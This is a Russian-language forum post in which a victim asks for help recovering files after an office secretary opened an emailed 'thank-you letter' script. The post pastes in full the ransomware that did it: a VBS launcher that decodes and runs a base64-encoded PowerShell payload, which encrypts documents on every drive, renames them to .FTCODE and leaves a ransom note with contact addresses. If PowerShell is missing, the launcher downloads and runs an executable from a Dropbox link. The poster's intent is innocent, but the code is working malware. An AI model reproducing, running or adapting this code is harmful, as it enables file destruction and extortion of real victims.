Запустили файл с trojan-downloader.vbs.agent.afp как вернуть данные?
Пришло по почте письмо благодарственное (Благодарственное письмо.PDF.vbs), секретарь его благополучно запустила но нечего не увидела (конечно же) и все файлы с расширением .doc .docx .jpg .pdf .rar поменяли расширения файла на .FTCODE и я так понял закриптились или еще что то с ними произошло, но поменяв обратно на родной тип файла он не открывается и говорит что файл поврежден и так со всеми документами сканами и т.п.
Я подозреваю что если есть файл vbs который все это натворил, можно же путем изменения файла этого добиться что бы он обратно все вернул, [U]вообщем помогите все вернуть[/U], сам не селен в vbs.
Структура скрипта
[HELP]'%JEVycm9yQWN0aW9uUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7aWYoKChHZXQtUHJvY2VzcyAtTmFtZSBwb3dlcnNoZWxsKS5jb3VudCkgLWdlIDIpe2V4aXR9JHJlZj1bUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoJ1N5c3RlbS5TZWN1cml0eScpO0FkZC1UeXBlIC1Bc3NlbWJseSBTeXN0ZW0uV2ViOyRlaz1bV2ViLlNlY3VyaXR5Lk1lbWJlcnNoaXBdOjpHZW5lcmF0ZVBhc3N3b3JkKDUwLCRudW1iZXJPZk5vbkFscGhhbnVtZXJpY0NoYXJhY3RlcnMpO1tieXRlW11dJGJ5dGVzPVtzeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVuaWNvZGUuR2V0Qnl0ZXMoJGVrKTskYmFzZWtleT0iQmdJQUFBQ2tBQUJTVTBFeEFBUUFBQUVBQVFEVFlVWnlWeGhoNDhSLzFZL0g1TmRFZ2k0OURJSHRKVFhtK21jVkhudlVwWWlORW54cEZqL1VKWFZEZzBGMnJmV0ZwbnlxSEowZGJ5anNPQ3dNWDBlUnlwMlZ4cldGek9ISU02UXBldnhHRjlpelhlTnE3K096QnVvMTFWLzdFbXZRQlcyc2Z1TkVPUDd6ZFV3MERGS29LK1gyVGFld2FraTFMR1locHNoanFnPT0iOyRyc2EgPSBOZXctT2JqZWN0IFN5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUlNBQ3J5cHRvU2VydmljZVByb3ZpZGVyOyRyc2EuSW1wb3J0Q3NwQmxvYihbc3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRiYXNla2V5KSk7JGVuY2tleT1bc3lzdGVtLkNvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZygkcnNhLkVuY3J5cHQoJGJ5dGVzLCAkZmFsc2UpKTskdGV4dD0i0JXRgdC70Lgg0JLRiyDRh9C40YLQsNC10YLQtSDRjdGC0L4g0YHQvtC+0LHRidC10L3QuNC1LCDQt9C90LDRh9C40YIg0JLQsNGIINC60L7QvNC/0YzRjtGC0LXRgCDQsdGL0Lsg0LDRgtCw0LrQvtCy0LDQvSDQvtC/0LDRgdC90LXQudGI0LjQvCDQstC40YDRg9GB0L7QvC5gcmBu0JLRgdGPINCS0LDRiNCwINC40L3RhNC+0YDQvNCw0YbQuNGPICjQtNC+0LrRg9C80LXQvdGC0YssINGE0LjQu9GM0LzRiyDQuCDQtNGA0YPQs9C40LUg0YTQsNC50LvRiykg0L3QsCDRjdGC0L7QvCDQutC+0LzQv9GM0Y7RgtC10YDQtSDQsdGL0LvQsCDQt9Cw0YjQuNGE0YDQvtCy0LDQvdCwYHJgbtGBINC/0L7QvNC+0YnRjNGOINGB0LDQvNC+0LPQviDQutGA0LjQv9GC0L7RgdGC0L7QudC60L7Qs9C+INCw0LvQs9C+0YDQuNGC0LzQsCDQsiDQvNC40YDQtSBSU0ExMDI0LmByYG7QktC+0YHRgdGC0LDQvdC+0LLQuNGC0Ywg0YTQsNC50LvRiyDQvNC+0LbQvdC+INGC0L7Qu9GM0LrQviDQv9GA0Lgg0L/QvtC80L7RidC4INGB0L/QtdGG0LjQsNC70YzQvdC+0Lkg0L/RgNC+0LPRgNCw0LzQvNGLLiDQp9GC0L7QsdGLINC10ZEg0L/QvtC70YPRh9C40YLRjCwg0JLQsNC8INC90LXQvtCx0YXQvtC00LjQvNC+YHJgbtC90LDQv9C40YHQsNGC0Ywg0L3QsNC8INC/0LjRgdGM0LzQviDQvdCwINCw0LTRgNC10YEgdW5ibG9ja0Byb2NrZXRtYWlsLmNvbSDQuNC70LggdW5ibG9ja0BsaXZlLnJ1YHJgbtCf0YDQuCDQv9C+0L/Ri9GC0LrQtSDRgNCw0YHRiNC40YTRgNC+0LLQutC4INCx0LXQtyDQvdCw0YjQtdC5INC/0YDQvtCz0YDQsNC80LzRiyDRhNCw0LnQu9GLINC80L7Qs9GD0YIg0L/QvtCy0YDQtdC00LjRgtGM0YHRjyFgcmBu0Jog0L/QuNGB0YzQvNGDINC/0YDQuNC60YDQtdC/0LjRgtC1INGE0LDQudC7LCDQutC+0YLQvtGA0YvQuSDQvdCw0YXQvtC00LjRgtGB0Y8g0L3QsCDRgNCw0LHQvtGH0LXQvCDRgdGC0L7Qu9C1IGAiUkVBRF9NRV9OT1chISEhISEuVFhUYCIsINC70LjQsdC+INGN0YLQvtGCINGE0LDQudC7YHJgbtCf0LjRgdGM0LzQsCDRgSDRg9Cz0YDQvtC30LDQvNC4INCx0YPQtNGD0YIg0YPQs9GA0L7QttCw0YLRjCDRgtC+0LvRjNC60L4g0JLQsNC8INC4INCS0LDRiNC40Lwg0YTQsNC50LvQsNC8ISDQndCVINCX0JDQkdCj0JTQrNCi0JU6INGC0L7Qu9GM0LrQviDQnNCrINC80L7QttC10Lwg0YDQsNGB0YjQuNGE0YDQvtCy0LDRgtGMINCS0LDRiNC4INGE0LDQudC70YshYHJgbmByYG4iICsgJGVuY2tleTtmdW5jdGlvbiBFbmNyeXB0LUZpbGUoJGl0ZW0sICRQYXNzcGhyYXNlKXskc2FsdD0iRlRDT0RFIGhhY2sgeW91ciBzeXN0ZW0iOyRpbml0PSJGVUNLSU5HIElOSVQiOyRyID0gbmV3LU9iamVjdCBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlJpam5kYWVsTWFuYWdlZDskcGFzcyA9IFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRCeXRlcygkUGFzc3BocmFzZSk7JHNhbHQgPSBbVGV4dC5FbmNvZGluZ106OlVURjguR2V0Qnl0ZXMoJHNhbHQpOyRyLktleSA9IChuZXctT2JqZWN0IFNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYXNzd29yZERlcml2ZUJ5dGVzICRwYXNzLCAkc2FsdCwgIlNIQTEiLCA1KS5HZXRCeXRlcygzMik7JHIuSVYgPSAobmV3LU9iamVjdCBTZWN1cml0eS5DcnlwdG9ncmFwaHkuU0hBMU1hbmFnZWQpLkNvbXB1dGVIYXNoKCBbVGV4dC5FbmNvZGluZ106OlVURjguR2V0Qnl0ZXMoJGluaXQpIClbMC4uMTVdOyRyLlBhZGRpbmc9Ilplcm9zIjskci5Nb2RlPSJDQkMiOyRjID0gJHIuQ3JlYXRlRW5jcnlwdG9yKCk7JG1zID0gbmV3LU9iamVjdCBJTy5NZW1vcnlTdHJlYW07JGNzID0gbmV3LU9iamVjdCBTZWN1cml0eS5DcnlwdG9ncmFwaHkuQ3J5cHRvU3RyZWFtICRtcywkYywiV3JpdGUiOyRjcy5Xcml0ZSgkaXRlbSwgMCwkaXRlbS5MZW5ndGgpOyRjcy5DbG9zZSgpOyRtcy5DbG9zZSgpOyRyLkNsZWFyKCk7cmV0dXJuICRtcy5Ub0FycmF5KCk7fSRkaXNrcz1HZXQtUFNEcml2ZXxXaGVyZS1PYmplY3QgeyRfLkZyZWUgLWd0IDUwMDAwfXxTb3J0LU9iamVjdCAtRGVzY2VuZGluZztmb3JlYWNoKCRkaXNrIGluICRkaXNrcyl7Z2NpICRkaXNrLlJvb3QgLVJlY3Vyc2UgLUluY2x1ZGUgIiouZG9jIiwiKi54bHMiLCIqLmRvY3giLCIqLnhsc3giLCIqLmRiIiwiKi5tcDMiLCIqLndhdyIsIiouanBnIiwiKi5qcGVnIiwiKi50eHQiLCIqLnJ0ZiIsIioucGRmIiwiKi5yYXIiLCIqLnppcCIsIioucHNkIiwiKi5tc2kiLCIqLnRpZiIsIioud21hIiwiKi5sbmsiLCIqLmdpZiIsIiouYm1wIiwiKi5wcHQiLCIqLnBwdHgiLCIqLmRvY20iLCIqLnhsc20iLCIqLnBwcyIsIioucHBzeCIsIioucHBkIiwiKi50aWZmIiwiKi5lcHMiLCIqLnBuZyIsIiouYWNlIiwiKi5kanZ1IiwiKi54bWwiLCIqLmNkciIsIioubWF4IiwiKi53bXYiLCIqLmF2aSIsIioud2F2IiwiKi5tcDQiLCIqLnBkZCIsIiouaHRtbCIsIiouY3NzIiwiKi5waHAiLCIqLmFhYyIsIiouYWMzIiwiKi5hbWYiLCIqLmFtciIsIioubWlkIiwiKi5taWRpIiwiKi5tbWYiLCIqLm1vZCIsIioubXAxIiwiKi5tcGEiLCIqLm1wZ2EiLCIqLm1wdSIsIioubnJ0IiwiKi5vZ2EiLCIqLm9nZyIsIioucGJmIiwiKi5yYSIsIioucmFtIiwiKi5yYXciLCIqLnNhZiIsIioudmFsIiwiKi53YXZlIiwiKi53b3ciLCIqLndwayIsIiouM2cyIiwiKi4zZ3AiLCIqLjNncDIiLCIqLjNtbSIsIiouYW14IiwiKi5hdnMiLCIqLmJpayIsIiouYmluIiwiKi5kaXIiLCIqLmRpdngiLCIqLmR2eCIsIiouZXZvIiwiKi5mbHYiLCIqLnF0cSIsIioudGNoIiwiKi5ydHMiLCIqLnJ1bSIsIioucnYiLCIqLnNjbiIsIiouc3J0IiwiKi5zdHgiLCIqLnN2aSIsIiouc3dmIiwiKi50cnAiLCIqLnZkbyIsIioud20iLCIqLndtZCIsIioud21tcCIsIioud214IiwiKi53dngiLCIqLnh2aWQiLCIqLjNkIiwiKi4zZDQiLCIqLjNkZjgiLCIqLnBicyIsIiouYWRpIiwiKi5haXMiLCIqLmFtdSIsIiouYXJyIiwiKi5ibWMiLCIqLmJtZiIsIiouY2FnIiwiKi5jYW0iLCIqLmRuZyIsIiouaW5rIiwiKi5qaWYiLCIqLmppZmYiLCIqLmpwYyIsIiouanBmIiwiKi5qcHciLCIqLm1hZyIsIioubWljIiwiKi5taXAiLCIqLm1zcCIsIioubmF2IiwiKi5uY2QiLCIqLm9kYyIsIioub2RpIiwiKi5vcGYiLCIqLnFpZiIsIioucXRpcSIsIiouc3JmIiwiKi54d2QiLCIqLmFidyIsIiouYWN0IiwiKi5hZHQiLCIqLmFpbSIsIiouYW5zIiwiKi5hc2MiLCIqLmFzZSIsIiouYmRwIiwiKi5iZHIiLCIqLmJpYiIsIiouYm9jIiwiKi5jcmQiLCIqLmRpeiIsIiouZG90IiwiKi5kb3RtIiwiKi5kb3R4IiwiKi5kdmkiLCIqLmR4ZSIsIioubWx4IiwiKi5lcnIiLCIqLmV1YyIsIiouZmFxIiwiKi5mZHIiLCIqLmZkcyIsIiouZ3RociIsIiouaWR4IiwiKi5rd2QiLCIqLmxwMiIsIioubHRyIiwiKi5tYW4iLCIqLm1ib3giLCIqLm1zZyIsIioubmZvIiwiKi5ub3ciLCIqLm9kbSIsIioub2Z0IiwiKi5wd2kiLCIqLnJuZyIsIioucnR4IiwiKi5ydW4iLCIqLnNzYSIsIioudGV4dCIsIioudW54IiwiKi53YmsiLCIqLndzaCIsIiouN3oiLCIqLmFyYyIsIiouYXJpIiwiKi5hcmoiLCIqLmNhciIsIiouY2JyIiwiKi5jYnoiLCIqLmd6IiwiKi5nemlnIiwiKi5qZ3oiLCIqLnBhayIsIioucGN2IiwiKi5wdXoiLCIqLnIwMCIsIioucjAxIiwiKi5yMDIiLCIqLnIwMyIsIioucmV2IiwiKi5zZG4iLCIqLnNlbiIsIiouc2ZzIiwiKi5zZngiLCIqLnNoIiwiKi5zaGFyIiwiKi5zaHIiLCIqLnNxeCIsIioudGJ6MiIsIioudGciLCIqLnRseiIsIioudnNpIiwiKi53YWQiLCIqLndhciIsIioueHBpIiwiKi56MDIiLCIqLnowNCIsIiouemFwIiwiKi56aXB4IiwiKi56b28iLCIqLmlwYSIsIiouaXN1IiwiKi5qYXIiLCIqLmpzIiwiKi51ZGYiLCIqLmFkciIsIiouYXAiLCIqLmFybyIsIiouYXNhIiwiKi5hc2N4IiwiKi5hc2h4IiwiKi5hc214IiwiKi5hc3AiLCIqLmFzcHgiLCIqLmFzciIsIiouYXRvbSIsIiouYm1sIiwiKi5jZXIiLCIqLmNtcyIsIiouY3J0IiwiKi5kYXAiLCIqLmh0bSIsIioubW96IiwiKi5zdnIiLCIqLnVybCIsIioud2RndCIsIiouYWJrIiwiKi5iaWMiLCIqLmJpZyIsIiouYmxwIiwiKi5ic3AiLCIqLmNnZiIsIiouY2hrIiwiKi5jb2wiLCIqLmN0eSIsIiouZGVtIiwiKi5lbGYiLCIqLmZmIiwiKi5nYW0iLCIqLmdyZiIsIiouaDNtIiwiKi5oNHIiLCIqLml3ZCIsIioubGRiIiwiKi5sZ3AiLCIqLmx2bCIsIioubWFwIiwiKi5tZDMiLCIqLm1kbCIsIioubW02IiwiKi5tbTciLCIqLm1tOCIsIioubmRzIiwiKi5wYnAiLCIqLnBwZiIsIioucHdmIiwiKi5weHAiLCIqLnNhZCIsIiouc2F2IiwiKi5zY20iLCIqLnNjeCIsIiouc2R0IiwiKi5zcHIiLCIqLnN1ZCIsIioudWF4IiwiKi51bXgiLCIqLnVuciIsIioudW9wIiwiKi51c2EiLCIqLnVzeCIsIioudXQyIiwiKi51dDMiLCIqLnV0YyIsIioudXR4IiwiKi51dngiLCIqLnV4eCIsIioudm1mIiwiKi52dGYiLCIqLnczZyIsIioudzN4IiwiKi53dGQiLCIqLnd0ZiIsIiouY2NkIiwiKi5jZCIsIiouY3NvIiwiKi5kaXNrIiwiKi5kbWciLCIqLmR2ZCIsIiouZmNkIiwiKi5mbHAiLCIqLmltZyIsIiouaXNvIiwiKi5pc3oiLCIqLm1kMCIsIioubWQxIiwiKi5tZDIiLCIqLm1kZiIsIioubWRzIiwiKi5ucmciLCIqLm5yaSIsIioudmNkIiwiKi52aGQiLCIqLnNucCIsIiouYmtmIiwiKi5hZGUiLCIqLmFkcGIiLCIqLmRpYyIsIiouY2NoIiwiKi5jdHQiLCIqLmRhbCIsIiouZGRjIiwiKi5kZGN4IiwiKi5kZXgiLCIqLmRpZiIsIiouZGlpIiwiKi5pdGRiIiwiKi5pdGwiLCIqLmtteiIsIioubGNkIiwiKi5sY2YiLCIqLm1ieCIsIioubWRuIiwiKi5vZGYiLCIqLm9kcCIsIioub2RzIiwiKi5wYWIiLCIqLnBrYiIsIioucGtoIiwiKi5wb3QiLCIqLnBvdHgiLCIqLnBwdG0iLCIqLnBzYSIsIioucWRmIiwiKi5xZWwiLCIqLnJnbiIsIioucnJ0IiwiKi5yc3ciLCIqLnJ0ZSIsIiouc2RiIiwiKi5zZGMiLCIqLnNkcyIsIiouc3FsIiwiKi5zdHQiLCIqLnQwMSIsIioudDAzIiwiKi50MDUiLCIqLnRjeCIsIioudGhteCIsIioudHhkIiwiKi50eGYiLCIqLnVwb2kiLCIqLnZtdCIsIioud2tzIiwiKi53bWRiIiwiKi54bCIsIioueGxjIiwiKi54bHIiLCIqLnhsc2IiLCIqLnhsdHgiLCIqLmx0bSIsIioueGx3eCIsIioubWNkIiwiKi5jYXAiLCIqLmNjIiwiKi5jb2QiLCIqLmNwIiwiKi5jcHAiLCIqLmNzIiwiKi5jc2kiLCIqLmRjcCIsIiouZGN1IiwiKi5kZXYiLCIqLmRvYiIsIiouZG94IiwiKi5kcGsiLCIqLmRwbCIsIiouZHByIiwiKi5kc2siLCIqLmRzcCIsIiouZXFsIiwiKi5leCIsIiouZjkwIiwiKi5mbGEiLCIqLmZvciIsIiouZnBwIiwiKi5qYXYiLCIqLmphdmEiLCIqLmxiaSIsIioub3dsIiwiKi5wbCIsIioucGxjIiwiKi5wbGkiLCIqLnBtIiwiKi5yZXMiLCIqLnJuYyIsIioucnNyYyIsIiouc28iLCIqLnN3ZCIsIioudHB1IiwiKi50cHgiLCIqLnR1IiwiKi50dXIiLCIqLnZjIiwiKi55YWIiLCIqLjhiYSIsIiouOGJjIiwiKi44YmUiLCIqLjhiZiIsIiouOGJpOCIsIiouYmk4IiwiKi44YmwiLCIqLjhicyIsIiouOGJ4IiwiKi44YnkiLCIqLjhsaSIsIiouYWlwIiwiKi5hbXh4IiwiKi5hcGUiLCIqLmFwaSIsIioubXhwIiwiKi5veHQiLCIqLnFweCIsIioucXRyIiwiKi54bGEiLCIqLnhsYW0iLCIqLnhsbCIsIioueGx2IiwiKi54cHQiLCIqLmNmZyIsIiouY3dmIiwiKi5kYmIiLCIqLnNsdCIsIiouYnAyIiwiKi5icDMiLCIqLmJwbCIsIiouY2xyIiwiKi5kYngiLCIqLmpjIiwiKi5wb3RtIiwiKi5wcHNtIiwiKi5wcmMiLCIqLnBydCIsIiouc2h3IiwiKi5zdGQiLCIqLnZlciIsIioud3BsIiwiKi54bG0iLCIqLnlwcyIsIioubWQzIiwiKi4xY2QiIHwgJXt0cnkgeyRmaWxlPVtpby5maWxlXTo6T3BlbigkXywgJ09wZW4nLCAnUmVhZFdyaXRlJyk7aWYgKCRmaWxlLkxlbmd0aCAtbHQgIjQwOTYwIil7JHNpemU9JGZpbGUuTGVuZ3RofWVsc2V7JHNpemU9IjQwOTYwIn1bYnl0ZVtdXSRidWZmID0gbmV3LW9iamVjdCBieXRlW10gJHNpemU7JFRvRW5jcnlwdCA9ICRmaWxlLlJlYWQoJGJ1ZmYsIDAsICRidWZmLkxlbmd0aCk7JGZpbGUuUG9zaXRpb249JzAnOyRFbmNyeXB0ZWQ9RW5jcnlwdC1GaWxlICRidWZmICRlazskZmlsZS5Xcml0ZSgkRW5jcnlwdGVkLCAwLCAkRW5jcnlwdGVkLkxlbmd0aCk7JGZpbGUuQ2xvc2UoKTskbmV3bmFtZT0kXy5OYW1lKycuRlRDT0RFJztyZW4gLVBhdGggJF8uRnVsbE5hbWUgLU5ld05hbWUgJG5ld25hbWUgLUZvcmNlOyRwYXRoPSRfLkRpcmVjdG9yeU5hbWUrJ1xSRUFEX01FX05PVyEhISEhIS5UWFQnO2lmKCEoVGVzdC1QYXRoICRwYXRoKSl7c2MgLXBhdCAkcGF0aCAtdmEgJHRleHR9fWNhdGNoe319fQ==
Const SYSTEM32 = &H25
Set fso = CreateObject("Scripting.FileSystemObject")
Set objShell = CreateObject("Shell.Application")
Set wshShell = CreateObject( "WScript.Shell" )
Set objFolder = objShell.Namespace(SYSTEM32)
Set objFolderItem = objFolder.Self
arguments = " -command $path=((get-content -Path '" + Wscript.ScriptFullName + "' -totalcount 1) -split '%')[1];$bytes = [System.Convert]::FromBase64String($path);$decoded = [System.Text.Encoding]::UTF8.GetString($bytes);Invoke-Expression $decoded"
Path = objFolderItem.Path + "\WindowsPowerShell\v1.0\powershell.exe"
newPath = Path & arguments
RarPath = wshShell.ExpandEnvironmentStrings("%TMP%") & "\powershell.exe"
TestPath = wshShell.ExpandEnvironmentStrings("%TMP%") & "\powershell\powershell.exe"
appNewPath = wshShell.ExpandEnvironmentStrings("%TMP%") & "\powershell\powershell.exe" & arguments
If (fso.FileExists(Path)) Then
wshShell.Run newPath, 0, False
Else
If Not (fso.FileExists(TestPath)) Then
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "https://dl.dropbox.com/sh/wn8x35r9l9wsitn/XSwafOFh9E/powershell.exe?dl=1", False
xHttp.Send
with bStrm
.type = 1 '//binary
.open
.write xHttp.responseBody
.savetofile RarPath, 2 '//overwrite
end with
wshShell.Run RarPath, 0, True
End If
wshShell.Run appNewPath, 0, True
End If[/HELP]
Сам файл